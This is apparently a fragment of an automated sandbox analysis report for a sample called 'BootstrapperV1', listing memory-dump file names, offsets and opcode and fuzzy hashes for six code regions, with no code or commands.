                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d130c6a8537bb9ee423bfbad53f6c3c1cb2cb22aa1356eafb1d0909762d4c67
                                              • Instruction ID: 263dfd64b5bae84d7c51c1abc27344c3116dd147b7dc37d8852966696a0b8439
                                              • Opcode Fuzzy Hash: 5d130c6a8537bb9ee423bfbad53f6c3c1cb2cb22aa1356eafb1d0909762d4c67
                                              • Instruction Fuzzy Hash: E6D0A710F1992D09FB7861EC24A13F82081CF48224F820176D41DD22DEDC9E1D9102C2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b703367d5406b91986decb0241b28c48e8cd24c2868f5813d200dfa1af5c79ab
                                              • Instruction ID: 034358d4aed7ff605516a4d1b26d3b471cae387cc50a78b4c0a10e5ca706128b
                                              • Opcode Fuzzy Hash: b703367d5406b91986decb0241b28c48e8cd24c2868f5813d200dfa1af5c79ab
                                              • Instruction Fuzzy Hash: E5E08C4090F7C91FDF02BBBC446A19A3FB04F0B24070844E9C0899F0F3E008040EC302
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d41566ec289db0c9c0e1236429250594f18be49c0d52a3a30b65739f4429f1c
                                              • Instruction ID: 672da73e87b27132aa2b16aca2c24c289181e8a358292a2dd5cd14ba4d7b367b
                                              • Opcode Fuzzy Hash: 5d41566ec289db0c9c0e1236429250594f18be49c0d52a3a30b65739f4429f1c
                                              • Instruction Fuzzy Hash: 49E08C74F1EB1E4AE1706EA440203B97192BF44700F118A39C0AEC26F2CD7DB28157A0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c16e60116f58d505552d5c9f33d1b2f5bd7e082df6155ba609df794bcf060edd
                                              • Instruction ID: acb8dfaac0716d6a70639ce60d7eb1f489f8a5135947ed5ccb0f51e338809a17
                                              • Opcode Fuzzy Hash: c16e60116f58d505552d5c9f33d1b2f5bd7e082df6155ba609df794bcf060edd
                                              • Instruction Fuzzy Hash: CFD05E306092444FCB58AE2CA090C80B790EF1220835509ECE0144B2E7C56AEC82CB01
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1c897b40555b45c982157d78aafd6584ba5ee0cae40db3e61f4b143c88450d99
                                              • Instruction ID: 2d65ee6a978b06ed4f5bee8f388f65b8c0a7d5e7d1cda10e2a93df7edf649e90
                                              • Opcode Fuzzy Hash: 1c897b40555b45c982157d78aafd6584ba5ee0cae40db3e61f4b143c88450d99
                                              • Instruction Fuzzy Hash: AAB09B62E05B4D0BD391C95C149421116D3D7D8141B05831B5499C2275DD1554419350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 47841986c33c53000ff8a8d03fe4466156ca88ac963f95bb0cd9e95b307c0719
                                              • Instruction ID: 7fc03c094b4339023d32814aee64121fe057080109c9a5a8287088065b6dc018
                                              • Opcode Fuzzy Hash: 47841986c33c53000ff8a8d03fe4466156ca88ac963f95bb0cd9e95b307c0719
                                              • Instruction Fuzzy Hash: 0AA1393770D7694ED315B76DB8A54E9BB60EFC133A70503BBC2C98E0A3DA186246C6D1